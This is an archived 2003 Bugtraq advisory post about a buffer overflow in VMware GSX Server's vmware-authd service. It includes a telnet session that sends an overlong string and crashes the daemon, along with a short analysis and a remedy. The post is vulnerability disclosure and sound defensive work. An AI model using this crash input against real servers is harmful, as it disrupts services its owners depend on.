lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 31 Oct 2003 16:28:55 -0000
From: Darryl Swofford <dswofford@...g.com>
To: bugtraq@...urityfocus.com
Subject: VMWare GSX Server Authentication Server Buffer Overflow
    Vulnerability - Update




Author: Darryl Swofford
Email: dswofford@...g.com

Date: 2003/10/31

System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.

Description:
After reviewing BugTaq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to modify the sample code to exploit the updated vmware-authd service.

I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then you can view the overflow by using telnet with the following syntax and simply alter the code as I did. 

>telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 vmware-authd
 PANIC: Buffer overflow in VMAuthdSocketRead()
 >
Connection to host lost.


Analyses:
It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER, PASS, GLOBAL); however the initial readline can be overflowed as it does not control the amount of data passed to it. 
 
Remedy:
Stop and disable the VMware authorization service.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ